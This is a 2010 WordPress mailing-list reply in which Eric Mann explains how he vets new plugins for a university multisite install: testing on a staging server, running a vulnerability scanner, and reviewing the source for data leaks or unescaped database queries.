[wp-hackers] How to check a new plugin?
Eric Mann
eric at eam.me
Mon Nov 22 18:10:27 UTC 2010
I use multiple tests:
1. Install it on a test server to make sure that it actually works with
the version of WordPress it claims
2. Point a basic vulnerability scanner at the system (here's one called
WordPress Scanner: http://blogsecurity.net/wordpress/tools/wp-scanner)
3. Pull the source down and do a quick sanity check
Step 3 is actually more valuable to me than step 2. Even if a plug-in
"works" and doesn't raise any red flags, it could still be doing something
you don't want to your system. You can make sure the plug-in doesn't add
unnecessary database tables, doesn't email your sensitive information to 3rd
parties, escapes user input before processing database queries, etc.
So make sure the plug-in works as advertised, then do a quick walkthrough of
the code to make sure it's not doing anything funky. Any steps beyond that
just add to the security of your system, but might make it harder to
maintain things as new versions come out or as new plug-ins are requested.
On Mon, Nov 22, 2010 at 9:56 AM, Patrick Laverty
<patrick_laverty at brown.edu>wrote:
> When you want to add a new plugin to your system, what do you do to check
> it
> out for it's safety and security on your blog? I'm in charge of a ms
> instance at a University and I get requests for plugins all the time,
> especially for ones that are on version <1 or admit they're "alpha" or
> "beta" versions. I don't want to simply reject something because of it's
> label, but I'm not totally sure how to evaluate a new plugin. Do any of
> you
> put them on a test server and then point a vulnerability scanner at the new
> plugin to see what happens? Advice?
>
> Thanks.
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
More information about the wp-hackers
mailing list